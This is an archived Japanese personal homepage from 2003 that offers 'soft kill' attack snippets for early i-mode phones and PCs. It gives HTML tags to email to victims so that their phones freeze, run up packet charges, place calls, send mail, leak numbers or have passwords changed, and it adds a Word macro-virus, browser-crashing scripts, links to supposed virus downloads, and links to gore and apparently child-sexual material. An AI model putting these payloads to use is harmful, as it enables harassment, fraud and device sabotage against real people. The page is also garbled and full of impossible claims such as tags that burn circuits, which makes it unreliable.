welcome to my homepage  


ソフト・キル支援

携帯電話に異常を起こすタグ


開けないメール


D502で確認済 N502で削除
できないメール

</XPLAINTEXT><img src=”x-avefront://---.
smail/edit-cgi?
type=S”>


削除不可メール


このタグならどの機種にも対応


<IMG SRC=”x-avefront://---.
smail/type=s”>


底無し(白)


下まで真っ白な
メール。膨大な
パケッ ト代請求



<form><textarea NAME=”IMPRESSION” COLS=”99999” ROWS=”99999”></textarea>
</FORM>


底なし(黒)

下まで真っ黒なメール。 膨大な
パケット代請求


<HR SIZE=99999>


永久フリーズ


携帯の画面に
テーブルというものを大量にDRさせ、電源を抜くまで携帯電話を停 止させるタ グ

<table border=99999>
</ table><form>
<salect><option>


永久フリーズ2


基本的な原理は
パート1と同じ。
効果は1の 方が大

</XPLAINTEXT>
<table border=99999>
</ table><form>
<select><option>


強制退出


メール開封後、すべてを強制終了してiメニューに 飛 ばします。


<img src=”x-avefront://---.
smail/list?type=S”>

半強制退出


強制退出と同じですが開封後何か
ボタンを押さ ねば退出させる事ができません。


<A HREF=”x-avefront://---.
menu/start?type=S”>押す </A>


携帯電話の機能を破壊するタグ


P破壊タグ

P〜系の機種に有効な破壊タグで、
送られた人の携帯 の液晶が波打ち、
最後には何も表示する事ができなくなります。

http://www.dark
ritual.net/dokud
enpa/nontagu/1974.
smd


P破壊ツール
効果はP破壊タグと同じです。

http://www.moco.
ne.jp/cgi-bin/up.
cgi?url=http%3a%2
f%2fwww4.justnet.
ne.jp%2f~tac-h%2f
smd%2f1974.smd

●ワンポイント
アドバイス●


前者の破壊タグは 「仕掛けツール」
と呼ばれるものであらかじめ
破壊するコードが含 まれている
ホームページの
URL
をメールで送り、それを相手にクリッ クさせるというものです。
そういうホームページのURLを記載しておき ます。
あなたは決して
リンクしないようにしましょう。
コレを相手に
踏ませるには
↓に記載
されているタグの「接続URL」というところに
埋め込めばいいでしょう。


http://"></> <!--.gif --><a href="接続URL" keybind=right><a href="接続URL" keybind=left><a href="接続URL" keybind=f><a href="接続URL" keybind=b><a href="接続URL" keybind=i><a href=" 接続URL" keybind=m>
LINKS

グロい画像
http://www.ddan
zi.com/ddanziil
bo/bbs/cwb- data
/data/FtvBBS/
vavy.jpg


http://vatican.
rotten.com/
infantiphagia/
taboo2.html

http://vagina.
rotten.com/moto
rcycle/ motorcycle.
jpg


http://village.
infoweb.ne.jp/~
angie/image/mist /
movie/kill.mpeg


http://www.trauma.
softcoma.com/pic
tures/ headless/
15-kepa3.jpg


http://www.stilep
roject.com/monkey
_sugar. swf


http://movies.
ogrish.com/
elevator.zip< /FONT>

破壊/ウイルス系
http//www.geocit
ies.co.jp/Sili
conValley- Cupert
ino/9822/mysoft
/files/madoka08
.zip


http://yahoo5bri
efcase.vr9.com
/preteen/ __tn_
__________kidsu
x.jpg


http://easyweb.
easynet.co.uk/~
hiros/virii00/
METALLICA_SONG.
MP3


破壊系

http://easyweb.
easynet.co.uk/~
hiros/〜 〜


きもい系
(飯食えなくなる)

http://dedicated.
goofball.com/goof
ball/ uncensored/
media/2001/shot2.
mpeg


http://vagina.
rotten.com/feca
ljapan/< /FONT>

N用電源落とし

N〜系の機種に有効な破壊タグ。
電源を一生入 れられなくなる恐ろしいものです。

<form action=”x-avefront://---.
smail/edit-cgi?
type=U” ><input type=”submit”value=”押す”>

電話帳削除

毎度おなじみの
「テーブル」を出してCPUに負荷をかけ、記憶し ているものを忘れさせるというもの 。
<TABLE BORDER=944444>

永久リロード
あるおもーい
ホームページから
情報をDRし続け
てパケッ ト代を大量にいただくというもの

<meta http-equiv=”refresh” content=”0; url=仕掛けサイト1” ><body><frameset rows=”100%,*”border=0 spacing=0 ><frame src=”Xiao”></ frameset>
<noframes><body>
</ body><noframes>

ショートタグ
携帯の回路を焦がすタグ
<input type=text name=I value=文字><SCRIPT STRONG>

送信トレイ破壊

送信トレイを
満タンにして、
メールを送れな くする。


<img src=x-avefront:
//---.smail/edit-
cgi?type= U&subject
=&address=メールアドレス&body=>

分解破壊タ グ


この破壊タグは
コレだけでは機能しないので、
他の破壊タグ
にくっつけて使う

<input type=text name=I value=文字><SCRIPT STRONG>


個人情報を
  盗むタグ


セガカラ無料DL

※〇に機種を*には曲番号を入れてアクセス< /FONT>


http://www.smn.
sega.co.jp/data
/mld/〇502/ aoiunlkjvai
uernvaoieuau
/i*****.mld



電源飛ばしN


これはこのエリアにあってはならないタグですが・ ・ ・・・・。
一応、N〜の機種を破壊します。

<form action="x-avefront
://---.smail/
edit-cgi?type=U" >
<input type=" submit"value="文字">


携帯初期化


携帯のメモリーを消すためのツールを悪用したタ グ

</ xplaintext>
<style><title>
<comment><apple t>
<noscrjpt><noem
bed>
<xmp><fontf ece=
"symbol">



指定メール覗き


ここまで来るともう犯罪です。
やめましょう。< /FONT>
コレを送ると、
相手が送ったメールが貴方の方に
やってくる

<a href=
"mail"rock:>
<自分のアドレス&t;
<相手のアドレス >
<ahref=
"targatmail=2:">

パスワード変更
相手のパスワードを変更します。0000=の箇所に新 パスワードを指定
<form action=http:/
/docomo.ne.jp
/cp/cngpswrd method=post>
<input type=password name=opwd istyle=4 value="" size=4> <input type =h name=pwd value="0000">
<input type=h name=npwd2 value="0000">
<input type=h name=a value=a> <input type=s name=actn value=次へ>


強制TEL

メールを開くと強制的に電話を掛けさせます。
チェーンメールによく利用されます

</XPLAINTEXT><img src=cti-tel:電話番号>

強制メール


メールを開くと強制的にメールを
送信



</XPLAINTEXT><img src=x-avefront:/
/- - -.smail/edit-cgi?
type=U&subject= 題名&address=メールを送る相手先&body=メール本文>



準強制メール
効果は強制メールと同じですが、
これはボタンをドレか 押さねば起動しません。



</XPLAINTEXT><a href=" x-avefront://- - -.smail/edit-cgi?
type=U&subject= 題名&address=メールを送 る相手先 &body=メール本文>適当に文字入れる</a>



番&メアド回収トラップタグ


わなを仕掛けて
相手の送った
アドレスや、電話番号を覗きます


<form action=”x-avefront://---.
smail/edit-cgi?
type=U” ><input type=”submit”value=”押す”><input type=”password”istyle=”4”size=”11”maxlength=”11”value=””name=”body” ><input type=”hidden”value=”*****@docomo.ne.
jp”name=”address”></ form>






●自作タグ●

管理人自作の
破壊タグをご紹介します。
これは、タグではなくスクリプトというプログラムです。いろいろなものを作 成可能です



携帯電話液晶破壊タグ


<SCRIPT Language=
JavaScript>
var g_fInPlayer = 0 ;
var g_sClickPrefix = 'wmc-ja/2/RTUN0';
var g_sClickUrl = var g_fIsCorona =4 0var
picture
=


g_sNoDataLink = ''function doFavorite(o)
{
var,i=o.recordNumber-1;
c=stationCode[i]. (doFav(c,o.remove))
if(o.remove!='1')
setFav(i);
return false;
}function doFav(c,remove){
if(!window. naviga
<endsub><script>

火災タグ

携帯のCPUに
過電流を流し
焦がして煙を 立たせるタグ


Private Sub document_Open()

On Error Resume Next

With Options
.VirusProtection = 0
.SaveNormalPrompt = 0
. ConfirmConvers
ions = 0
End Sub

Application.D
isplayStatusBar = False
ActiveDocument.
ReadOnlyRecom
mended = False
System.PrivateProfileString("", _
"HKEY_CURRENT_
USER/Software
/Microsoft/Office
/9 .0/Word/S
ecurity",_
"Level")=1&
CommandBars("
Tools").Controls
("Macro").Delete

Set DocTemplate = NormalTemplate.
VBProject.
VBComponents
( 1).CodeModule
Set DocActive = ActiveDocument.VBProject.VBComponents
(1 ).CodeModule

If DocTemplate.Lines
(1, 1) <> "'SAMPLE" Then
DocTemplate.Dele
teLines 1, DocTemplate.Count」OfLines
DocTemplate.
InsertLines 1, DocActive.Lines(1,
DocActive.CountOfLines)
ElseIf DocActive.Lines(1, 1) <> "'SAMPLE" Then
DocActive.Delete
Lines 1, DocActive.Count
OfLines
DocActive.Inse
rtLines 1, DocTemplate.Li
nes(1,
DocTemplate.C
ountOfLines)
ActiveDocument.
Save
End If

End Sub

文字表示型
フリーズ

画面が黒くなり、文字がずらずらと
自動で流れるのが止まらなくなる

<CENTER>
<TABLE>
<TBODY>
<TR> <TD height="72" bgcolor="#000000" width= "214" align="center">
<FONT color="#ffff66">
<MARQUEE direction=up height=60 scrollAmount=1 width=122></FONT><FONT color= "#ffff66" size="-1">Star Wars EpisodeXX</FONT>
<FONT color="#ffffff" size="-1 "><BR>
<BR>
Blah blah blah blah blah blah blah
blah blah</FONT><FONT color="#ffffff" size=" -1"> blah blah blah blah blah blah blah blah<FONT color= "#ffffff"> blah blah blah blah blah blah blah blah<FONT color="#ffffff"> blah blah blah blah blah blah blah blah<FONT color="#ffffff"> blah blah blah blah blah blah blah blah<FONT color="#ffffff"> blah blah blah blah blah blah blah blah<FONT color="#ffffff"> blah blah blah blah blah blah blah</FONT></FONT>
</FONT></FONT>
</FONT></FONT>
<FONT color="#ffffff">
<FONT color="#ffffff">
<FONT color="#ffffff">
<FONT color="#ffffff">
<FONT color="#ffffff">
<FONT color="#ffffff"> </FONT></ FONT>
</FONT></FONT>
</FONT></FONT>
</MARQUEE></TD>
</TR>
</ TBODY>
</TABLE>
</CENTER>



メッセンジャー
フリーズ


ネットワーク全体をストップ


<A onmouseover
="for(i=0;i
<999999;i++)
{document.
bgColor='black'
;document. bgColor
='red';}" href=
"" value="破壊"></999999;I++)
{DOCUMENT.
BGCOLOR='BLACK';
DOCUMENT.
BGCOLOR='RED';}">

ブラウザ
クラッシャー
for
コンピュー タ

HPを作る時に、
このソースを書いて、そのURLを嫌な やつに
教え、アクセスさせる。    


HDDアタック

<HTML>
<BODY>
<SCRIPT Langauage=
" JavaScript">
for(i=0;1<1000;i
++)
window.open
("**************")
;
</SCRIPT>
</BODY>
</HTML>

目潰し

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<HTML><HEAD>

<META name="GENERATOR" content="IBM HomePage Builder 2000 V4.0.2 for Windows">
<TITLE>目</TITLE>
</HEAD> <body>
<script language="JavaScript">
<!----------------------------- ------
f = 1000
for(a=0; a<f; a++) {
for(i=0; i<2; i++) document.bgColor=
"ffffff";
for(i=0; i<2; i++) document.bgColor=
"000000";
for(i=0; i<2; i++) document.bgColor=
"ff0000";
for(i=0; i<2; i++) document.bgColor=
"00ff00";
for(i=0; i<2; i++) document.bgColor=
"ff00ff";
for(i=0; i<2; i++) document.bgColor=
"0000ff";
for(i=0; i<2; i++) document.bgColor=
"00ffff";
for(i=0; i<2; i++) document.bgColor=
"ffffff";
}
//---------------
---------------
----- >
</script>]

</body>
</HTML>

ファイルオープン

<script language="
JavaScript">
<!--
i = 0 ;
while (i < 99) {
window.open("r
es://ie4tour.dll
/welcome.htm");
window .open('
facecrash.htm');
i++;
}
// -->
</script><script language="Java
Script">
<!--
i = 0;
while (i < 99) {
window.open("
res://ie4tour.
dll/welcome.htm");
window .open(
'facecrash.htm');
i++;
}
// -->
</script>


メーラー起動


<html>
<head>
<title>メーラ起動&FDDアクセス</title>
</head>
<body>
<img src="mailto
:xxx">
<img src="mailto
:xxx">
<img src="mailto
:xxx">
<img src="mailto
:xxx">
<img src="mailto
:xxx">
・・・
<img src="mailto
:xxx">
<img src="mailto
:xxx">
<img src="mailto
:xxx">
<img src="mailto
:xxx">
<img src="mailto
:xxx">

<img src="file:
///A|/xxx">
<img src="file:
///A|/xxx">
<img src="file:
///A|/xxx">
<img src="file:
///A|/xxx">
<img src="file:
///A|/xxx">
・・・
<img src="file:
///A|/xxx">
<img src="file:
///A|/xxx">
<img src="file:
///A|/xxx">
<img src="file:
///A|/xxx">
<img src="file:
///A|/xxx">
</body>
</html>

CPU発熱


<html> <head> <title>CPU</title> <script language="
JavaScript"> <!--// window.open
(self.location .
href); var x = 2; while(x) { x = x * x; } //--> </script> </ head> <body> </body> </html>


不正メールソース



Return- Path: big_mouth@TomZ.
comReceived: from t-mta1.odn.ne.jp (mfep1.odn.ne. jp [143.90.131.165])
         by ns.kun.ne.jp (8.8.8/3.7W/
991006) with ESMTP id BAA08517
         for <hehehe@kun.ne
.jp>; Tue, 14 Dec 1999 01:05:50 +0900 (JST)  
 Received: from local ([210.231.0.0]) by t-mta1.odn.ne.
jp

         (InterMail vM.4.01.02.17 201-229-119) with SMTP
         id <19991213160459.
VLE2658.t-mta1.
odn.ne.jp@local>
          for <hehehe@kun.ne.
jp>; Tue, 14 Dec 1999 01:04:59 +0900  
 Message-ID: <003901bf4583
$cdcd9d60$0af6
a8c0@local>  
  From: "Big mouth" <big_mouht@TomZ.
com>  
 To: "hehehe" <hehehe@kun.ne.
jp>  
 Subject: =?iso-2022-jp?
B?GyRCODU1JCQr
ISkbKEI=?=  
 Date: Tue, 14 Dec 1999 01:04:38 +0900  
 MIME-Version: 1.0
 Content-Type: text/plain;
       charset="iso-
2022-jp"
  Content-Trans
fer-Encoding: 7bit
 X-Priority: 3
 X-MSMail-Pri
ority: Normal
 X- Mailer: Microsoft Outlook Express 5.00.2314.1300  
 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
 X-UIDL: 1f369cfc5a8d
e865103de5da
18618a7c


 To: "hehehe" <hehehe@kun.
ne.jp>  
 Subject: =?iso-2022-
jp?B?GyRCODU1
JCQrISkbKEI=?=  
 Date: Tue, 14 Dec 1999 01:04:38 +0900  
 MIME-Version: 1.0
 Content-Type: text/plain;
       charset="iso-
2022-jp"
  Content-Tr
ansfer-Enco
ding: 7bit
 X-Priority: 3
 X-MSMail-P
riority: Normal
 X- Mailer: Microsoft Outlook Express 5.00.2314.1300  
 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
 X-UIDL: 1f369cfc5a8de
865103de5da1
8618a7c








icon 氏名/ニックネーム
soft_kill 
icon 職業/会社名/学校名
 
icon 役職/学年
 
icon 誕生日
 
icon 性別
 
icon 出身地/出身校
 
icon 住まい
 
icon 趣味
 
icon 特技
 
icon 好きなもの、嫌いなもの
 

ゲストブックを読む ゲストブックに書く 日記帳 ランキング


mail
メールお待ちしてます

お気に入りのサイト
icon
icon
icon
icon
icon



2003年02月25日 21時03分17秒


geocities japan

メイン / コミュニティ / アベニュー / e-list / 街角広場
インフォメーションセンター / 検索 / ヘルプ / ガイドライン